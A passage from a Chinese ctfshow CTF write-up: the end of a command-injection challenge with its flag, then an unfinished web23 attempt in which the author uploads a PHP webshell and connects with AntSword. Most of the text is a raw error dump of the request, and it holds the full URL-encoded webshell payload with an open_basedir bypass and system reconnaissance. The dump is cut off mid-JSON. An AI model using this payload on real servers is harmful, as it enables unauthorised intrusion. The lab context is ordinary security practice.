此时 nl 文件的文件名被作为 linux 命令执行,即执行命令 nl secretsecret_ctfshow_36dddddddddd.php zzz.php,使得之后两个文件的内容被按行号输出:


得到 flag

Flag

ctfshow{b018e56a-6f5e-484d-bebc-04b9de63f8f0}

参考

ctfshow萌新计划类web全解 wp-丨Arcueid丨-CSDN
每天一个linux命令(11):nl命令-peida-博客园

【未完成】web23

题目

阿呆觉得最安全的代码就是什么都没有

分析

猜测是文件上传漏洞,新建了个一句话木马文件上传,用中国蚁剑进入后台发现报错。

错误
{"response":{"_events":{},"_eventsCount":0,"accepted":false,"badRequest":false,"body":{"type":"Buffer","data":[]},"buffered":true,"clientError":true,"created":false,"error":{"method":"POST","path":"/uploads/20240213142923813.php","status":404},"forbidden":false,"header":{"connection":"close","content-encoding":"gzip","content-type":"text/html","date":"Tue, 13 Feb 2024 06:35:56 GMT","server":"nginx/1.20.1","transfer-encoding":"chunked"},"headers":{"connection":"close","content-encoding":"gzip","content-type":"text/html","date":"Tue, 13 Feb 2024 06:35:56 GMT","server":"nginx/1.20.1","transfer-encoding":"chunked"},"info":false,"links":{},"noContent":false,"notAcceptable":false,"notFound":true,"ok":false,"redirect":false,"redirects":[],"req":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":{"_consuming":false,"_dumped":false,"_events":{"error":[null,null]},"_eventsCount":3,"_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":false,"emitClose":true,"emittedReadable":false,"encoding":null,"endEmitted":true,"ended":true,"flowing":false,"highWaterMark":16384,"length":0,"needReadable":false,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":false,"readingMore":true,"resumeScheduled":false,"sync":true},"aborted":false,"client":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"complete":true,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"data":"","headers":{"connection":"close","content-encoding":"gzip","content-type":"text/html","date":"Tue, 13 Feb 2024 06:35:56 GMT","server":"nginx/1.20.1","transfer-encoding":"chunked"},"httpVersion":"1.1","httpVersionMajor":1,"httpVersionMinor":1,"method":null,"rawHeaders":["Server","nginx/1.20.1","Date","Tue, 13 Feb 2024 06:35:56 GMT","Content-Type","text/html","Transfer-Encoding","chunked","Connection","close","Content-Encoding","gzip"],"rawTrailers":[],"readable":false,"req":null,"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"statusCode":404,"statusMessage":"Not Found","trailers":{},"upgrade":false,"url":""},"sendDate":false,"shouldKeepAlive":false,"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"request":{"_agent":{},"_buffer":true,"_data":"web23=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.8709c43%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2223%22.%22327%22%3Becho%20%40asenc(%24output)%3Becho%20%220e3%22.%2286b%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B","_enableHttp2":false,"_endCalled":true,"_events":{},"_eventsCount":0,"_formData":null,"_header":{"content-type":"application/x-www-form-urlencoded","user-agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)"},"_ignoreHttps":true,"_maxRedirects":5,"_proxyUri":"","_query":[],"_redirectList":[],"_redirects":0,"_resBuffered":true,"_responseTimeout":0,"_streamRequest":false,"_timeout":10000,"_uploadTimeout":0,"_url":"http://8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show/uploads/20240213142923813.php","called":true,"cookies":"","header":{"Content-Type":"application/x-www-form-urlencoded","User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)"},"host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","method":"POST","protocol":"http:","qs":{},"qsRaw":[],"req":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":{"_consuming":false,"_dumped":false,"_events":{"error":[null,null]},"_eventsCount":3,"_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":false,"emitClose":true,"emittedReadable":false,"encoding":null,"endEmitted":true,"ended":true,"flowing":false,"highWaterMark":16384,"length":0,"needReadable":false,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":false,"readingMore":true,"resumeScheduled":false,"sync":true},"aborted":false,"client":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"complete":true,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"data":"","headers":{"connection":"close","content-encoding":"gzip","content-type":"text/html","date":"Tue, 13 Feb 2024 06:35:56 GMT","server":"nginx/1.20.1","transfer-encoding":"chunked"},"httpVersion":"1.1","httpVersionMajor":1,"httpVersionMinor":1,"method":null,"rawHeaders":["Server","nginx/1.20.1","Date","Tue, 13 Feb 2024 06:35:56 GMT","Content-Type","text/html","Transfer-Encoding","chunked","Connection","close","Content-Encoding","gzip"],"rawTrailers":[],"readable":false,"req":null,"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"statusCode":404,"statusMessage":"Not Found","trailers":{},"upgrade":false,"url":""},"sendDate":false,"shouldKeepAlive":false,"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"res":{"_consuming":false,"_dumped":false,"_events":{"error":[null,null]},"_eventsCount":3,"_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":false,"emitClose":true,"emittedReadable":false,"encoding":null,"endEmitted":true,"ended":true,"flowing":false,"highWaterMark":16384,"length":0,"needReadable":false,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":false,"readingMore":true,"resumeScheduled":false,"sync":true},"aborted":false,"client":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":null,"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":null,"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"complete":true,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":null,"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":null,"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"data":"","headers":{"connection":"close","content-encoding":"gzip","content-type":"text/html","date":"Tue, 13 Feb 2024 06:35:56 GMT","server":"nginx/1.20.1","transfer-encoding":"chunked"},"httpVersion":"1.1","httpVersionMajor":1,"httpVersionMinor":1,"method":null,"rawHeaders":["Server","nginx/1.20.1","Date","Tue, 13 Feb 2024 06:35:56 GMT","Content-Type","text/html","Transfer-Encoding","chunked","Connection","close","Content-Encoding","gzip"],"rawTrailers":[],"readable":false,"req":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"